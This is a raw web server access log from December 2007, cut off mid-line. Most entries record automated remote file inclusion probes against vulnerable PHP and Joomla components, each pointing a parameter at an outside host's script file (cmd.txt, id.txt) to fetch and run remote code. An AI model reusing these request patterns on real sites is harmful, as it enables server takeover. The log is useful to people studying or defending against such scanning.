208.186.169.183 - - [23/Dec/2007:19:24:12 -0800] "GET /logs/test.php?page=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.241.217.51 - - [23/Dec/2007:19:24:35 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.162.134.131 - - [23/Dec/2007:19:24:37 -0800] "GET //[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.97.212.250 - - [23/Dec/2007:19:26:07 -0800] "GET /logs/access_071105.log//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.97.212.250 - - [23/Dec/2007:19:26:07 -0800] "GET /logs//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.186.169.183 - - [23/Dec/2007:19:26:12 -0800] "GET /logs/access_070917.log/test.php?page=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
194.204.11.65 - - [23/Dec/2007:19:26:40 -0800] "GET /logs/access_070716.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.centrogassystem.com/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.204.11.65 - - [23/Dec/2007:19:26:45 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.centrogassystem.com/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.204.11.65 - - [23/Dec/2007:19:26:46 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.centrogassystem.com/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.213.31.4 - - [23/Dec/2007:19:26:46 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
62.213.31.4 - - [23/Dec/2007:19:26:47 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
194.204.11.65 - - [23/Dec/2007:19:26:57 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.centrogassystem.com/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.216.107 - - [23/Dec/2007:19:27:02 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:19:28:02 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:19:28:02 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.32.85.218 - - [23/Dec/2007:19:28:02 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
216.32.85.218 - - [23/Dec/2007:19:28:02 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6"
209.97.212.250 - - [23/Dec/2007:19:28:23 -0800] "GET /logs/access_071217.log//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.191.50.159 - - [23/Dec/2007:19:31:19 -0800] "GET /logs/access_071105.log//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.50.159 - - [23/Dec/2007:19:31:19 -0800] "GET /logs//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:31:48 -0800] "GET /logs/access_071014.log//]/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:31:48 -0800] "GET //]/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:31:49 -0800] "GET /logs/access_071014.log//]/modu